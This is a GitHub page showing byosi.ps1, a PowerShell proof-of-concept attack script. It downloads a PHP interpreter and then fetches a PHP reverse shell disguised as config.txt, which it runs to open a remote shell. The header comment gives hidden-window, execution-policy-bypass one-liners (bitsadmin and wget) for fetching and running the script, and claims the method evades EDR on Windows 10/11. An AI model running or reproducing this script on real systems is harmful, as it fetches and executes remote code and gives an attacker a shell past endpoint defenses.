-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbyosi.ps1
23 lines (16 loc) · 1.07 KB
/
byosi.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<#
BYOSI POC - Changed the interpreter, the environment variables, arguments, and made a new php shell.
Tested against a default installation of Windows 10 updated, and Windows 10/11 with EDR running.
Method 1
bitsadmin /transfer myDownloadJob /download /priority high https://raw.githubusercontent.com/fuzzlove/byosi/refs/heads/main/byosi.ps1 %temp%\myscript.ps1 & powershell -exec bypass -nop -w hidden -file %temp%\myscript.ps1
Method 2
wget https://raw.githubusercontent.com/fuzzlove/byosi/refs/heads/main/byosi.ps1 -o byosipoc.ps1;./byosipoc.ps1
#>
# Download our php interpreter
wget https://windows.php.net/downloads/releases/php-8.0.30-nts-Win32-vs16-x86.zip -O $Env:temp\\php.zip
# Extract from c:\windows\temp\php.zip to c:\php (default path)
Expand-Archive -Path $Env:temp\\php.zip -DestinationPath C:\\php
# Download our reverse shell
wget https://raw.githubusercontent.com/fuzzlove/byosi/refs/heads/main/php.txt -O C:\\php\\config.txt
# Run php with required sockets extention for reverse shell
& "C:\\php\\php.exe" @('-d extension=sockets') @('C:\php\config.txt')